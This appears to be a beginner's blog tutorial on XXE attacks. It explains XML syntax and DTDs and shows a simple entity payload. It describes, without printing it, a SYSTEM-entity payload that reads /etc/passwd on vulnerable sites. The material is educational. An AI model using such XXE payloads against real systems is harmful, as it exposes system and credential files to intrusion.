XML External Entity (XXE) attack
A Comprehensive guide to XXE Attacks and exploitation
Hello folks welcome to my blog and todays topic is all about the XXE attack. An XML External Entity (XXE) attack is a type of security flaw that takes advantage of how XML parsers handle data. It lets attackers manipulate the application to access backend systems or external resources. They can read files on the system, cause a Denial of Service (DoS) attack, or trick the application into making requests to other systems. XXE attacks can even allow for port scanning and remote code execution.
There are two main types of XXE attacks:
1) In-band XXE attack: Here, the attacker receives an immediate response to their XXE payload.
2) Out-of-band (OOB-XXE) attack: Also known as blind XXE, there’s no immediate response from the application. The attacker needs to find a way to reflect the output of their XXE payload to another file or their own server.
Before we move on to learn about XXE exploitation we’ll have to understand XML properly.
What is XML?
XML (eXtensible Markup Language) is a versatile markup language used for encoding documents in a readable format for both humans and machines. It’s widely employed for storing and transporting data due to its flexibility and platform-independence.
Why we use XML?
1. Platform and Language Independence: XML works on any system and supports technological changes seamlessly.
2. Data Flexibility: Data encoded in XML can be modified without affecting its presentation.
3. Validation Support: XML supports validation using DTD (Document Type Definition) and Schema, ensuring error-free documents.
4. Interoperability: Sharing data across different systems is simplified as XML doesn’t require conversion during transfer.
Syntax
XML Prolog: An optional line specifying the XML version and encoding used
<?xml version="1.0" encoding="UTF-8"?>
Above the line is called XML prolog and it specifies the XML version and the encoding used in the XML document. This line is not compulsory to use but it is considered a `good practice` to put that line in all your XML documents.
Every XML document must contain a `ROOT` element. For example:
<?xml version="1.0" encoding="UTF-8"?>
<mail>
<to>falcon</to>
<from>feast</from>
<subject>About XXE</subject>
<text>Teach about XXE</text>
</mail>
In the above example the <mail>
is the ROOT element of that document and <to>
, <from>
, <subject>
, <text>
are the children elements. If the XML document doesn't have any root element then it would be consideredwrong
or invalid
XML doc.
Another thing to remember is that XML is a case sensitive language. If a tag starts like <to>
then it has to end by </to>
and not by something like </To>
(notice the capitalization of T
)
Like HTML we can use attributes in XML too. The syntax for having attributes is also very similar to HTML. For example:
<text category = "message">You need to learn about XXE</text>
In the above example category
is the attribute name and message
is the attribute value.
Now don’t be confused by DTD Before we move on to start learning about XXE we’ll have to understand what is DTD in XML.
DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.
Let us try to understand this with the help of an example. Say we have a file named note.dtd
with the following content:
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.
Ex: Below is given an XML document that uses note.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>falcon</to>
<from>feast</from>
<heading>hacking</heading>
<body>XXE attack</body>
</note>
So now let’s understand how that DTD validates the XML. Here’s what all those terms used in note.dtd
mean
- !DOCTYPE note — Defines a root element of the document named note
- !ELEMENT note — Defines that the note element must contain the elements: “to, from, heading, body”
- !ELEMENT to — Defines the
to
element to be of type "#PCDATA" - !ELEMENT from — Defines the
from
element to be of type "#PCDATA" - !ELEMENT heading — Defines the
heading
element to be of type "#PCDATA" - !ELEMENT body — Defines the
body
element to be of type "#PCDATA"
NOTE: #PCDATA means parseable character data.
Now we’ll see some XXE payload and see how they are working.
- The first payload we’ll see is very simple. If you’ve read the previous task properly then you’ll understand this payload very easily.
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
As we can see we are defining a ENTITY
called name
and assigning it a value feast
. Later we are using that ENTITY in our code.
2) We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword
This code can not be directly written in the blog try this out to write this code and you can’t upload the blog haha blog is not handling this.
Here again, we are defining an ENTITY with the name read
but the difference is that we are setting it value to `SYSTEM` and path of the file.
If we use this payload then a website vulnerable to XXE(normally) would display the content of the file /etc/passwd
.
In a similar manner, we can use this kind of payload to read other files but a lot of times you can fail to read files in this manner or the reason for failure could be the file you are trying to read.
Now let us see some payloads in action. The payload that I’ll be using is the one we saw in the previous task.
1) Let’s see how the website would look if we’ll try to use the payload for displaying the name.
On the left side, we can see the burp request that was sent with the URL encoded payload and on the right side we can see that the payload was able to successfully display name falcon feast
2) Now let’s try to read the /etc/passwd
That’s all for today and see you in next post.
keep the bytes…